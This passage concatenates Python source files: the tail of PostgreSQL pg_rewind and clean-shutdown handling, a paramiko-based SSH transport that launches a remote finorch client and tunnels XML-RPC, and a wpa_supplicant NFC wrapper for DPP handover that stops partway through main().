        the state transitions)."""
        if self._postgresql.is_running() and not self._postgresql.stop(checkpoint=False):
            return logger.warning('Can not run pg_rewind because postgres is still running')

        # prepare pg_rewind connection
        r = self._conn_kwargs(leader, self._postgresql.config.rewind_credentials)

        # 1. make sure that we are really trying to rewind from the master
        # 2. make sure that pg_control contains the new timeline by:
        #   running a checkpoint or
        #   waiting until Patroni on the master will expose checkpoint_after_promote=True
        checkpoint_status = leader.checkpoint_after_promote if isinstance(leader, Leader) else None
        if checkpoint_status is None:  # master still runs the old Patroni
            leader_status = self._postgresql.checkpoint(self._conn_kwargs(leader, self._postgresql.config.superuser))
            if leader_status:
                return logger.warning('Can not use %s for rewind: %s', leader.name, leader_status)
        elif not checkpoint_status:
            return logger.info('Waiting for checkpoint on %s before rewind', leader.name)
        elif not self.check_leader_is_not_in_recovery(r):
            return

        if self.pg_rewind(r):
            self._state = REWIND_STATUS.SUCCESS
        elif not self.check_leader_is_not_in_recovery(r):
            logger.warning('Failed to rewind because master %s become unreachable', leader.name)
        else:
            logger.error('Failed to rewind from healty master: %s', leader.name)
            for name in ('remove_data_directory_on_rewind_failure', 'remove_data_directory_on_diverged_timelines'):
                if self._postgresql.config.get(name):
                    logger.warning('%s is set. removing...', name)
                    self._postgresql.remove_data_directory()
                    self._state = REWIND_STATUS.INITIAL
                    break
            else:
                self._state = REWIND_STATUS.FAILED
        return False

    def reset_state(self):
        self._state = REWIND_STATUS.INITIAL
        with self._checkpoint_task_lock:
            self._checkpoint_task = None

    @property
    def is_needed(self):
        return self._state in (REWIND_STATUS.CHECK, REWIND_STATUS.NEED)

    @property
    def executed(self):
        return self._state > REWIND_STATUS.NOT_NEED

    @property
    def failed(self):
        return self._state == REWIND_STATUS.FAILED

    def read_postmaster_opts(self):
        """returns the list of option names/values from postgres.opts, Empty dict if read failed or no file"""
        result = {}
        try:
            with open(os.path.join(self._postgresql.data_dir, 'postmaster.opts')) as f:
                data = f.read()
                for opt in data.split('" "'):
                    if '=' in opt and opt.startswith('--'):
                        name, val = opt.split('=', 1)
                        result[name.strip('-')] = val.rstrip('"\n')
        except IOError:
            logger.exception('Error when reading postmaster.opts')
        return result

    def single_user_mode(self, communicate=None, options=None):
        """run a given command in a single-user mode. If the command is empty - then just start and stop"""
        cmd = [self._postgresql.pgcommand('postgres'), '--single', '-D', self._postgresql.data_dir]
        for opt, val in sorted((options or {}).items()):
            cmd.extend(['-c', '{0}={1}'.format(opt, val)])
        # need a database name to connect
        cmd.append('template1')
        return self._postgresql.cancellable.call(cmd, communicate=communicate)

    def cleanup_archive_status(self):
        """Remove leftover files/links from pg_wal/archive_status."""
        status_dir = os.path.join(self._postgresql.wal_dir, 'archive_status')
        try:
            for f in os.listdir(status_dir):
                path = os.path.join(status_dir, f)
                try:
                    if os.path.islink(path):
                        os.unlink(path)
                    elif os.path.isfile(path):
                        os.remove(path)
                except OSError:
                    logger.exception('Unable to remove %s', path)
        except OSError:
            logger.exception('Unable to list %s', status_dir)

    def ensure_clean_shutdown(self):
        """Produce a clean shutdown by starting/stopping in single-user mode.

        Returns True on success, None on failure."""
        self.cleanup_archive_status()

        # Start in a single user mode and stop to produce a clean shutdown
        opts = self.read_postmaster_opts()
        opts.update({'archive_mode': 'on', 'archive_command': 'false'})
        self._postgresql.config.remove_recovery_conf()
        output = {}
        ret = self.single_user_mode(communicate=output, options=opts)
        if ret != 0:
            logger.error('Crash recovery finished with code=%s', ret)
            logger.info(' stdout=%s', output['stdout'].decode('utf-8'))
            logger.info(' stderr=%s', output['stderr'].decode('utf-8'))
        return ret == 0 or None
|
ssh.py | import logging
from io import StringIO
import select
import xmlrpc.client
from socketserver import BaseRequestHandler, ThreadingTCPServer
from threading import Thread
from time import sleep
import paramiko
from finorch.config.config import api_config_manager
from finorch.transport.abstract_transport import AbstractTransport
from finorch.transport.exceptions import TransportConnectionException, TransportTerminateException, \
TransportGetJobFileException, TransportGetJobFileListException, TransportGetJobStatusException
class SshTransport(AbstractTransport):
    """Transport that starts a remote finorch client over SSH and talks to it
    via XML-RPC through a local paramiko port-forwarding tunnel."""

    def __init__(self, session, exec_path, *args, **kwargs):
        super().__init__(session, exec_path, *args, **kwargs)
        # exec path must exist for ssh session
        assert exec_path
        self._ssh_transport = None
        self._ssh_session = None
        # Connection parameters: host/username/python_path/callsign are
        # mandatory; the others fall back to defaults.
        self._host = kwargs['host']
        self._username = kwargs['username']
        self._ssh_password = kwargs.get('password', None)
        self._python_path = kwargs['python_path']
        self._env_file = kwargs.get('env_file', None)
        self._callsign = kwargs['callsign']
        self._ssh_port = kwargs.get('ssh_port', 22)
        self._remote_port = None
        # NOTE(review): imported locally, presumably to avoid a circular
        # import at module load time — confirm.
        from finorch.sessions import SshSession
        self._is_generic = isinstance(self._session, SshSession)
        self._ssh_client = paramiko.SSHClient()
        self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    def connect(self, *args, **kwargs):
        """Connect via SSH, (re)start the remote client if needed, set up the
        forwarding tunnel and the XML-RPC proxy.

        Returns the remote port the client listens on; raises
        TransportConnectionException on failure."""
        self._remote_port = kwargs['remote_port']
        self._remote_port = int(self._remote_port) if self._remote_port else None
        # If no ssh password is provided, then try to use the key from the api settings
        if not self._ssh_password:
            # Get the configuration for the specified session
            section = api_config_manager.get_section(self._callsign)
            if not section:
                raise TransportConnectionException("No password provided, and no key set")
            # Check if it has a key or not; generic sessions store one key per host
            key = section.get('key' if not self._is_generic else self._host, None)
            if not key:
                raise TransportConnectionException("No password provided, and no key set")
            skey = StringIO(key)
            pkey = paramiko.RSAKey.from_private_key(skey)
            # Set up a connection to the remote server using username and key
            self._ssh_client.connect(
                hostname=self._host,
                port=self._ssh_port,
                username=self._username,
                pkey=pkey,
            )
        else:
            # Set up a connection to the remote server using username and password
            self._ssh_client.connect(
                hostname=self._host,
                port=self._ssh_port,
                username=self._username,
                password=self._ssh_password
            )
        # Get the transport used by the client
        self._ssh_transport = self._ssh_client.get_transport()
        # First try to reconnect the previous port if it's set
        if self._remote_port:
            try:
                # Set up the ssh port forwarding
                self._forward_tunnel()
                # Connect the client rpc
                self._client_rpc = xmlrpc.client.ServerProxy(
                    f'http://localhost:{self._port}/rpc',
                    allow_none=True,
                    use_builtin_types=True
                )
                # Probe the endpoint; raises if the old client is gone.
                self._client_rpc.system.listMethods()
                # We're connected
                self._connected = True
                return self._remote_port
            except Exception:
                # Remote client is dead or invalid
                self._connection.server_close()
                self._connected = False
        # Remote client isn't running, start the remote client
        session = self._ssh_transport.open_channel("session")
        # Always try to make the execution directory and change to it
        command = f"bash --login -c \"mkdir -p {self.exec_path} && cd {self.exec_path} && "
        if self._env_file:
            command += f"source {self._env_file} && "
        command += f"{self._python_path} -m finorch.client.client {self._callsign}\""
        # Run the command to start the remote client
        logging.info(f"Executing command: {command}")
        session.exec_command(command)
        # Wait for the connection to close
        stdout, stderr = '', ''
        while True:  # monitoring process
            # Reading from output streams
            while session.recv_ready():
                stdout += session.recv(1000).decode('utf-8')
            while session.recv_stderr_ready():
                stderr += session.recv_stderr(1000).decode('utf-8')
            if session.exit_status_ready():  # If completed
                break
            sleep(0.1)
            # The remote client signals readiness with a final "=EOF=" line.
            if stdout.splitlines() and stdout.splitlines()[-1] == "=EOF=":
                break
        # Check that the command finished successfully
        if session.exit_status_ready() and session.exit_status:
            raise TransportConnectionException(
                f"Unable to start remote server.\nstdout:\n{stdout}\n\nstderr:\n{stderr}\n"
            )
        # Finished with the session now
        session.close()
        # Parse the remote stdout
        stdout = stdout.splitlines()
        # Check if the client started successfully
        if stdout[0] == "error":
            # Report the error from the client
            raise TransportConnectionException('\n'.join(stdout[1:]))
        # Try to parse the first line of the output from the client as the port it is running on
        try:
            self._remote_port = int(stdout[0])
        except ValueError:
            raise TransportConnectionException(f"Unable to parse the port. Got {stdout[0]}")
        # Set up the ssh port forwarding
        self._forward_tunnel()
        # Connect the client rpc
        self._client_rpc = xmlrpc.client.ServerProxy(
            f'http://localhost:{self._port}/rpc',
            allow_none=True,
            use_builtin_types=True
        )
        self._client_rpc.set_exec_path(self.exec_path)
        # We're connected
        self._connected = True
        return self._remote_port

    def disconnect(self):
        """Shut down the forwarding server and close the SSH connection."""
        super().disconnect()
        self._connection.shutdown()
        self._ssh_client.close()
        self._connected = False

    def get_job_file(self, job_identifier, file_path):
        """Fetch one job file; raises TransportGetJobFileException on failure."""
        status = self._client_rpc.get_job_file(job_identifier, file_path)
        if type(status) is bytes:
            return status
        else:
            # On failure the RPC returns a sequence whose second element is
            # the error message.
            raise TransportGetJobFileException(status[1])

    def get_job_file_list(self, job_identifier):
        """List the files of a job; raises TransportGetJobFileListException on failure."""
        status = self._client_rpc.get_job_file_list(job_identifier)
        if type(status) is list and status[0] is not None:
            return status
        else:
            raise TransportGetJobFileListException(status[1])

    def get_job_status(self, job_identifier):
        """Return the integer status of a job; raises TransportGetJobStatusException on failure."""
        status = self._client_rpc.get_job_status(job_identifier)
        if type(status) is int:
            return status
        else:
            raise TransportGetJobStatusException(status[1])

    def get_jobs(self):
        """Return the job list reported by the remote client."""
        return self._client_rpc.get_jobs()

    def start_job(self, katscript):
        """Submit *katscript* to the remote client and return its response."""
        return self._client_rpc.start_job(katscript)

    def stop_job(self, job_identifier):
        """Ask the remote client to stop the given job."""
        return self._client_rpc.stop_job(job_identifier)

    def terminate(self):
        """Terminate the remote client; requires an active connection."""
        if not self._connected:
            raise TransportTerminateException("Client is not connected")
        self._client_rpc.terminate()
        self._connected = False

    """
    SSH supporting code. Adapted from the following:-
    https://github.com/paramiko/paramiko/blob/main/demos/forward.py
    https://stackoverflow.com/questions/11294919/port-forwarding-with-paramiko
    """
    class SshForwardServer(ThreadingTCPServer):
        # Local TCP server whose handlers pipe connections through the SSH channel.
        daemon_threads = True
        allow_reuse_address = True

    class SshHandler(BaseRequestHandler):
        # Class attributes are filled in by the SubHander subclass created in
        # _forward_tunnel() below.
        chain_host = None
        chain_port = None
        ssh_transport = None

        def handle(self):
            """Bridge one local TCP connection to the remote end via SSH."""
            try:
                chan = self.ssh_transport.open_channel(
                    "direct-tcpip",
                    (self.chain_host, self.chain_port),
                    self.request.getpeername(),
                )
            except Exception as e:
                logging.error(
                    "Incoming request to %s:%d failed: %s"
                    % (self.chain_host, self.chain_port, repr(e))
                )
                return
            if chan is None:
                logging.error(
                    "Incoming request to %s:%d was rejected by the SSH server."
                    % (self.chain_host, self.chain_port)
                )
                return
            logging.info(
                "Connected! Tunnel open %r -> %r -> %r"
                % (
                    self.request.getpeername(),
                    chan.getpeername(),
                    (self.chain_host, self.chain_port),
                )
            )
            # Shuttle bytes in both directions until either side closes.
            while True:
                r, w, x = select.select([self.request, chan], [], [])
                if self.request in r:
                    data = self.request.recv(1024)
                    if len(data) == 0:
                        break
                    chan.send(data)
                if chan in r:
                    data = chan.recv(1024)
                    if len(data) == 0:
                        break
                    self.request.send(data)
            peername = self.request.getpeername()
            chan.close()
            self.request.close()
            logging.info("Tunnel closed from %r" % (peername,))

    def _forward_tunnel(self):
        """Start a local forwarding server bound to an ephemeral port."""
        # this is a little convoluted, but lets me configure things for the Handler
        # object. (SocketServer doesn't give Handlers any way to access the outer
        # server normally.)
        class SubHander(SshTransport.SshHandler):
            chain_host = "localhost"
            chain_port = self._remote_port
            ssh_transport = self._ssh_transport
        self._connection = SshTransport.SshForwardServer(("localhost", 0), SubHander)
        # Get the local port
        self._port = self._connection.server_address[1]

        # Start a thread to run the server
        def server_thread():
            self._connection.serve_forever()
        Thread(target=server_thread, daemon=True).start()
|
dpp-nfc.py | #!/usr/bin/python3
#
# Example nfcpy to wpa_supplicant wrapper for DPP NFC operations
# Copyright (c) 2012-2013, Jouni Malinen <j@w1.fi>
# Copyright (c) 2019-2020, The Linux Foundation
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import os
import sys
import time
import threading
import argparse
import nfc
import ndef
import logging
# Make the wpaspy helper module importable relative to this script.
scriptsdir = os.path.dirname(os.path.realpath("dpp-nfc.py"))
sys.path.append(os.path.join(scriptsdir, '..', '..', 'wpaspy'))
import wpaspy

# Directory containing wpa_supplicant control sockets; ifname optionally
# restricts wpas_connect() to a single interface.
wpas_ctrl = '/var/run/wpa_supplicant'
ifname = None

init_on_touch = False
# Terminal raw-mode bookkeeping used by clear_raw_mode().
in_raw_mode = False
prev_tcgetattr = 0
no_input = False

# Handover server instance and main-loop control flags.
srv = None
continue_loop = True
terminate_now = False

# Optional log files appended to by summary() / success_report().
summary_file = None
success_file = None
def summary(txt):
    """Print *txt* and, when a summary file is configured, append it there."""
    print(txt)
    if summary_file:
        with open(summary_file, 'a') as fh:
            fh.write(txt + "\n")
def success_report(txt):
    """Record *txt* via summary() and also append it to the success file."""
    summary(txt)
    if success_file:
        with open(success_file, 'a') as fh:
            fh.write(txt + "\n")
def wpas_connect():
    """Return a wpaspy.Ctrl for the first usable wpa_supplicant control
    socket, honoring the optional global ``ifname`` filter, or None."""
    ifaces = []
    if os.path.isdir(wpas_ctrl):
        try:
            ifaces = [os.path.join(wpas_ctrl, name) for name in os.listdir(wpas_ctrl)]
        except OSError as error:
            print("Could not find wpa_supplicant: ", error)
            return None

    if not ifaces:
        print("No wpa_supplicant control interface found")
        return None

    for ctrl in ifaces:
        if ifname and ifname not in ctrl:
            continue
        try:
            print("Trying to use control interface " + ctrl)
            return wpaspy.Ctrl(ctrl)
        except Exception:
            # Keep probing the remaining sockets.
            pass
    return None
def dpp_nfc_uri_process(uri):
    """Feed a DPP URI to wpa_supplicant and initiate DPP authentication.

    Returns True when authentication was started."""
    ctrl = wpas_connect()
    if ctrl is None:
        return False

    peer_id = ctrl.request("DPP_NFC_URI " + uri)
    if "FAIL" in peer_id:
        print("Could not parse DPP URI from NFC URI record")
        return False
    peer = int(peer_id)
    print("peer_id=%d" % peer)

    if "OK" not in ctrl.request("DPP_AUTH_INIT peer=%d" % peer):
        print("Failed to initiate DPP Authentication")
        return False
    print("DPP Authentication initiated")
    return True
def dpp_hs_tag_read(record):
    """Handle a DPP bootstrapping-info NFC Tag (URI record) read event.

    Validates the URI record payload and, when it carries a "DPP:" URI,
    hands it to wpa_supplicant. Returns True when DPP authentication was
    initiated, False otherwise."""
    wpas = wpas_connect()
    if wpas is None:
        return False
    print(record)
    if len(record.data) < 5:
        print("Too short DPP HS")
        return False
    if record.data[0] != 0:
        # First payload byte is the URI Identifier Code; 0 means no prefix.
        print("Unexpected URI Identifier Code")
        return False
    uribuf = record.data[1:]
    try:
        uri = uribuf.decode()
    except UnicodeDecodeError:
        # Fix: was a bare ``except:`` which would also swallow
        # KeyboardInterrupt/SystemExit; only decode() can fail here.
        print("Invalid URI payload")
        return False
    print("URI: " + uri)
    if not uri.startswith("DPP:"):
        print("Not a DPP URI")
        return False
    return dpp_nfc_uri_process(uri)
def get_status(wpas, extra=None):
    """Run the STATUS (or STATUS-<extra>) control command and return its
    key=value lines as a dict.

    Lines without '=' are reported and skipped."""
    if extra:
        extra = "-" + extra
    else:
        extra = ""
    res = wpas.request("STATUS" + extra)
    lines = res.splitlines()
    vals = dict()
    for l in lines:
        try:
            [name, value] = l.split('=', 1)
        except ValueError:
            # Fix: the visible module never creates a ``logger`` object, so the
            # original ``logger.info(...)`` raised NameError on malformed
            # lines; use the module-level logging function instead.
            logging.info("Ignore unexpected status line: " + l)
            continue
        vals[name] = value
    return vals
def get_status_field(wpas, field, extra=None):
    """Return a single field from the STATUS output, or None when absent."""
    return get_status(wpas, extra).get(field)
def own_addr(wpas):
    """Return the MAC address of the interface behind *wpas*."""
    return get_status_field(wpas, "address")
def dpp_bootstrap_gen(wpas, type="qrcode", chan=None, mac=None, info=None,
                      curve=None, key=None):
    """Run DPP_BOOTSTRAP_GEN with the given optional parameters and return
    the new bootstrapping entry id.

    ``mac=True`` means "use this interface's own address". Raises on FAIL."""
    parts = ["DPP_BOOTSTRAP_GEN type=" + type]
    if chan:
        parts.append("chan=" + chan)
    if mac:
        if mac is True:
            mac = own_addr(wpas)
        parts.append("mac=" + mac.replace(':', ''))
    if info:
        parts.append("info=" + info)
    if curve:
        parts.append("curve=" + curve)
    if key:
        parts.append("key=" + key)
    res = wpas.request(" ".join(parts))
    if "FAIL" in res:
        raise Exception("Failed to generate bootstrapping info")
    return int(res)
def wpas_get_nfc_uri(start_listen=True):
    """Create an nfc-uri DPP bootstrapping entry and return its URI string.

    Optionally starts DPP listen on 2412 MHz in the configurator role.
    Stores the new bootstrap id in the global ``own_id``."""
    global own_id, chanlist
    ctrl = wpas_connect()
    if ctrl is None:
        return None
    own_id = dpp_bootstrap_gen(ctrl, type="nfc-uri", chan=chanlist, mac=True)
    uri = ctrl.request("DPP_BOOTSTRAP_GET_URI %d" % own_id).rstrip()
    if "FAIL" in uri:
        return None
    if start_listen:
        ctrl.request("DPP_LISTEN 2412 netrole=configurator")
    return uri
def wpas_report_handover_req(uri):
    """Report a received NFC handover request URI to wpa_supplicant."""
    global own_id
    ctrl = wpas_connect()
    if ctrl is None:
        return None
    return ctrl.request("DPP_NFC_HANDOVER_REQ own=%d uri=%s" % (own_id, uri))
def wpas_report_handover_sel(uri):
    """Report a received NFC handover select URI to wpa_supplicant."""
    global own_id
    ctrl = wpas_connect()
    if ctrl is None:
        return None
    return ctrl.request("DPP_NFC_HANDOVER_SEL own=%d uri=%s" % (own_id, uri))
def dpp_handover_client(llc):
    """Act as the NFC connection-handover initiator for DPP.

    Sends a Handover Request carrying our DPP bootstrapping URI over *llc*,
    parses the peer's Handover Select, reports the peer URI to wpa_supplicant
    and initiates DPP authentication as configurator."""
    uri = wpas_get_nfc_uri(start_listen=False)
    uri = ndef.UriRecord(uri)
    print("NFC URI record for DPP: " + str(uri))
    # 'A' = active alternative-carrier power state.
    carrier = ndef.Record('application/vnd.wfa.dpp', 'A', uri.data)
    hr = ndef.HandoverRequestRecord(version="1.4", crn=os.urandom(2))
    hr.add_alternative_carrier('active', carrier.name)
    message = [hr, carrier]
    print("NFC Handover Request message for DPP: " + str(message))
    client = nfc.handover.HandoverClient(llc)
    try:
        summary("Trying to initiate NFC connection handover")
        client.connect()
        summary("Connected for handover")
    except nfc.llcp.ConnectRefused:
        summary("Handover connection refused")
        client.close()
        return
    except Exception as e:
        summary("Other exception: " + str(e))
        client.close()
        return
    summary("Sending handover request")
    if not client.send_records(message):
        summary("Failed to send handover request")
        client.close()
        return
    summary("Receiving handover response")
    message = client.recv_records(timeout=3.0)
    if message is None:
        summary("No response received")
        client.close()
        return
    print("Received message: " + str(message))
    if len(message) < 1 or \
       not isinstance(message[0], ndef.HandoverSelectRecord):
        summary("Response was not Hs - received: " + message.type)
        client.close()
        return
    print("Received message")
    print("alternative carriers: " + str(message[0].alternative_carriers))
    dpp_found = False
    for carrier in message:
        if isinstance(carrier, ndef.HandoverSelectRecord):
            continue
        print("Remote carrier type: " + carrier.type)
        if carrier.type == "application/vnd.wfa.dpp":
            # First payload byte is the URI Identifier Code; must be 0.
            if len(carrier.data) == 0 or carrier.data[0] != 0:
                print("URI Identifier Code 'None' not seen")
                continue
            print("DPP carrier type match - send to wpa_supplicant")
            dpp_found = True
            uri = carrier.data[1:].decode("utf-8")
            print("DPP URI: " + uri)
            res = wpas_report_handover_sel(uri)
            if res is None or "FAIL" in res:
                summary("DPP handover report rejected")
                break
            success_report("DPP handover reported successfully (initiator)")
            print("peer_id=" + res)
            peer_id = int(res)
            # TODO: Single Configurator instance
            wpas = wpas_connect()
            if wpas is None:
                break
            res = wpas.request("DPP_CONFIGURATOR_ADD")
            if "FAIL" in res:
                print("Failed to initiate Configurator")
                break
            conf_id = int(res)
            global own_id
            print("Initiate DPP authentication")
            cmd = "DPP_AUTH_INIT peer=%d own=%d conf=sta-dpp configurator=%d" % (peer_id, own_id, conf_id)
            res = wpas.request(cmd)
            if "FAIL" in res:
                print("Failed to initiate DPP authentication")
            break
    if not dpp_found:
        print("DPP carrier not seen in response - allow peer to initiate a new handover with different parameters")
        client.close()
        print("Returning from dpp_handover_client")
        return
    print("Remove peer")
    client.close()
    print("Done with handover")
    # Honor the command-line driven run-once / no-wait modes.
    global only_one
    if only_one:
        print("only_one -> stop loop")
        global continue_loop
        continue_loop = False
    global no_wait
    if no_wait:
        print("Trying to exit..")
        global terminate_now
        terminate_now = True
    print("Returning from dpp_handover_client")
class HandoverServer(nfc.handover.HandoverServer):
    """NFC connection-handover responder offering a DPP alternative carrier."""

    def __init__(self, llc):
        super(HandoverServer, self).__init__(llc)
        self.sent_carrier = None
        self.ho_server_processing = False
        self.success = False
        self.try_own = False

    def process_handover_request_message(self, records):
        """Build and return the Handover Select reply for a received request.

        Looks for an 'application/vnd.wfa.dpp' alternative carrier, reports
        its URI to wpa_supplicant and, on success, answers with our own DPP
        bootstrapping URI as the selected carrier."""
        self.ho_server_processing = True
        clear_raw_mode()
        print("\nHandoverServer - request received: " + str(records))
        carrier = None
        hs = ndef.HandoverSelectRecord('1.4')
        # Default reply carries no alternative carrier (nothing matched).
        sel = [hs]
        found = False
        for carrier in records:
            if isinstance(carrier, ndef.HandoverRequestRecord):
                continue
            print("Remote carrier type: " + carrier.type)
            if carrier.type == "application/vnd.wfa.dpp":
                print("DPP carrier type match - add DPP carrier record")
                # First payload byte is the URI Identifier Code; must be 0.
                if len(carrier.data) == 0 or carrier.data[0] != 0:
                    print("URI Identifier Code 'None' not seen")
                    continue
                uri = carrier.data[1:].decode("utf-8")
                print("Received DPP URI: " + uri)
                data = wpas_get_nfc_uri(start_listen=False)
                print("Own URI (pre-processing): %s" % data)
                res = wpas_report_handover_req(uri)
                if res is None or "FAIL" in res:
                    print("DPP handover request processing failed")
                    continue
                found = True
                self.received_carrier = carrier
                wpas = wpas_connect()
                if wpas is None:
                    continue
                global own_id
                # Re-fetch our URI: handover processing may have updated it.
                data = wpas.request("DPP_BOOTSTRAP_GET_URI %d" % own_id).rstrip()
                if "FAIL" in data:
                    continue
                print("Own URI (post-processing): %s" % data)
                uri = ndef.UriRecord(data)
                print("Own bootstrapping NFC URI record: " + str(uri))
                info = wpas.request("DPP_BOOTSTRAP_INFO %d" % own_id)
                freq = None
                for line in info.splitlines():
                    if line.startswith("use_freq="):
                        freq = int(line.split('=')[1])
                if freq is None:
                    print("No channel negotiated over NFC - use channel 1")
                    freq = 2412
                res = wpas.request("DPP_LISTEN %d" % freq)
                if "OK" not in res:
                    print("Failed to start DPP listen")
                    break
                carrier = ndef.Record('application/vnd.wfa.dpp', 'A', uri.data)
                print("Own DPP carrier record: " + str(carrier))
                hs.add_alternative_carrier('active', carrier.name)
                sel = [hs, carrier]
                break
        summary("Sending handover select: " + str(sel))
        if found:
            self.success = True
        else:
            # No usable carrier in the request: try initiating ourselves.
            self.try_own = True
        return sel
def clear_raw_mode():
    """Restore the terminal settings saved by getch(), if stdin is raw.

    Uses the module globals prev_tcgetattr/in_raw_mode that getch()
    maintains; a no-op when the terminal is not currently in raw mode.
    """
    # Fix: `tty` was imported here but never used; only sys and termios are needed.
    import sys, termios
    global prev_tcgetattr, in_raw_mode
    if not in_raw_mode:
        return
    fd = sys.stdin.fileno()
    termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
    in_raw_mode = False
def getch():
    """Poll stdin for a single keypress.

    Puts the terminal into raw mode for up to 50 ms and returns the
    character read, or None if nothing was typed. The previous terminal
    settings are always restored, and the module globals
    prev_tcgetattr/in_raw_mode are updated for clear_raw_mode().
    """
    import sys, tty, termios, select
    global prev_tcgetattr, in_raw_mode
    stdin_fd = sys.stdin.fileno()
    prev_tcgetattr = termios.tcgetattr(stdin_fd)
    char = None
    try:
        tty.setraw(stdin_fd)
        in_raw_mode = True
        readable, _, _ = select.select([stdin_fd], [], [], 0.05)
        if readable:
            char = sys.stdin.read(1)
    finally:
        termios.tcsetattr(stdin_fd, termios.TCSADRAIN, prev_tcgetattr)
        in_raw_mode = False
    return char
def dpp_tag_read(tag):
    """Process the NDEF records of a touched tag and hand DPP data to wpa_supplicant.

    Handles either a DPP carrier record (written as part of a Handover
    Select) or a "DPP:" URI record; only the first matching record is
    processed. Returns True when the tag was handled successfully.
    """
    success = False
    for record in tag.ndef.records:
        print(record)
        print("record type " + record.type)
        if record.type == "application/vnd.wfa.dpp":
            summary("DPP HS tag - send to wpa_supplicant")
            success = dpp_hs_tag_read(record)
            break
        if isinstance(record, ndef.UriRecord):
            print("URI record: uri=" + record.uri)
            print("URI record: iri=" + record.iri)
            if record.iri.startswith("DPP:"):
                print("DPP URI")
                if not dpp_nfc_uri_process(record.iri):
                    break
                success = True
            else:
                print("Ignore unknown URI")
            # Stop after the first URI record regardless of outcome.
            break
    if success:
        success_report("Tag read succeeded")
    return success
def rdwr_connected_write_tag(tag):
    """nfcpy on-connect callback used when writing a tag.

    Writes the records prepared in the global dpp_tag_data to the touched
    tag if it is writable and has room. Returns dpp_sel_wait_remove so
    nfcpy knows whether to wait for the tag to be removed.
    """
    summary("Tag found - writing - " + str(tag))
    if not tag.ndef.is_writeable:
        print("Not a writable tag")
        return
    global dpp_tag_data
    # NOTE(review): tag.ndef.capacity is in bytes while len(dpp_tag_data)
    # counts records — this likely under-estimates the required space;
    # confirm against the encoded message length.
    if tag.ndef.capacity < len(dpp_tag_data):
        print("Not enough room for the message")
        return
    # Assigning to tag.ndef.records performs the actual tag write.
    tag.ndef.records = dpp_tag_data
    success_report("Tag write succeeded")
    print("Done - remove tag")
    global only_one
    if only_one:
        global continue_loop
        continue_loop = False
    global dpp_sel_wait_remove
    return dpp_sel_wait_remove
def write_nfc_uri(clf, wait_remove=True):
    """Fetch the DPP bootstrapping URI from wpa_supplicant and write it to
    a tag as a plain NDEF URI record via the rdwr_connected_write_tag
    callback."""
    global dpp_sel_wait_remove, dpp_tag_data
    print("Write NFC URI record")
    uri_text = wpas_get_nfc_uri()
    if uri_text is None:
        summary("Could not get NFC URI from wpa_supplicant")
        return
    dpp_sel_wait_remove = wait_remove
    print("URI: %s" % uri_text)
    record = ndef.UriRecord(uri_text)
    print(record)
    print("Touch an NFC tag")
    dpp_tag_data = [record]
    clf.connect(rdwr={'on-connect': rdwr_connected_write_tag})
def write_nfc_hs(clf, wait_remove=True):
    """Build a Handover Select message carrying our DPP URI and write it
    to a tag via the rdwr_connected_write_tag callback."""
    global dpp_sel_wait_remove, dpp_tag_data
    print("Write NFC Handover Select record on a tag")
    uri_text = wpas_get_nfc_uri()
    if uri_text is None:
        summary("Could not get NFC URI from wpa_supplicant")
        return
    dpp_sel_wait_remove = wait_remove
    print("URI: %s" % uri_text)
    uri = ndef.UriRecord(uri_text)
    print(uri)
    carrier = ndef.Record('application/vnd.wfa.dpp', 'A', uri.data)
    hs = ndef.HandoverSelectRecord('1.4')
    hs.add_alternative_carrier('active', carrier.name)
    print(hs)
    print(carrier)
    print("Touch an NFC tag")
    dpp_tag_data = [hs, carrier]
    print(dpp_tag_data)
    clf.connect(rdwr={'on-connect': rdwr_connected_write_tag})
def rdwr_connected(tag):
    """nfcpy on-connect callback for tag reading.

    Reads DPP data from an NDEF tag, optionally stopping the main loop in
    only_one mode. The return value tells nfcpy whether to wait for tag
    removal (True) or return immediately (False, no_wait mode).
    """
    global only_one, no_wait
    summary("Tag connected: " + str(tag))
    if not tag.ndef:
        summary("Not an NDEF tag - remove tag")
        return True
    print("NDEF tag: " + tag.type)
    print(tag.ndef.records)
    read_ok = dpp_tag_read(tag)
    if only_one and read_ok:
        global continue_loop
        continue_loop = False
    return not no_wait
def llcp_worker(llc):
    """Worker thread driving the LLCP handover exchange.

    Depending on configuration it either starts the handover client
    immediately (init_on_touch), waits for a peer-initiated handover to
    finish, or polls stdin so the user can press 'i' to initiate manually.
    """
    global init_on_touch
    if init_on_touch:
        print("Starting handover client")
        dpp_handover_client(llc)
        print("Exiting llcp_worker thread (init_in_touch)")
        return

    global no_input
    if no_input:
        print("Wait for handover to complete")
    else:
        print("Wait for handover to complete - press 'i' to initiate")
    global srv
    global wait_connection
    # Loop until the LLCP link goes down or the server sent a carrier.
    while not wait_connection and srv.sent_carrier is None:
        if srv.try_own:
            # The server could not answer the peer's request and asked us
            # to retry as initiator with our own parameters.
            srv.try_own = False
            print("Try to initiate another handover with own parameters")
            dpp_handover_client(llc)
            print("Exiting llcp_worker thread (retry with own parameters)")
            return
        if srv.ho_server_processing:
            time.sleep(0.025)
        elif no_input:
            time.sleep(0.5)
        else:
            res = getch()
            if res != 'i':
                continue
            clear_raw_mode()
            print("Starting handover client")
            dpp_handover_client(llc)
            print("Exiting llcp_worker thread (manual init)")
            return
    clear_raw_mode()
    print("\rExiting llcp_worker thread")
def llcp_startup(llc):
    """nfcpy on-startup callback: create the handover server for this LLCP
    link and publish it through the module global srv."""
    global srv
    print("Start LLCP server")
    srv = HandoverServer(llc)
    return llc
def llcp_connected(llc):
    """nfcpy on-connect callback: start the handover server (unless we are
    the initiator) and spawn the worker thread that drives the exchange."""
    global wait_connection, init_on_touch
    print("P2P LLCP connected")
    wait_connection = False
    if not init_on_touch:
        global srv
        srv.start()
    if init_on_touch or not no_input:
        worker = threading.Thread(target=llcp_worker, args=(llc,))
        worker.start()
    return True
def llcp_release(llc):
    """nfcpy on-release callback; log the event and accept the release."""
    print("LLCP release")
    return True
def terminate_loop():
    """Polled by clf.connect() to decide whether to abort waiting."""
    # Reading a module global needs no `global` declaration.
    return terminate_now
def main():
    """Command line entry point.

    Parses arguments, publishes them through the module globals the nfcpy
    callbacks read, then either writes a tag (write-nfc-uri /
    write-nfc-hs) or loops waiting for tags/peers until stopped.
    """
    parser = argparse.ArgumentParser(description='nfcpy to wpa_supplicant integration for DPP NFC operations')
    parser.add_argument('-d', const=logging.DEBUG, default=logging.INFO,
                        action='store_const', dest='loglevel',
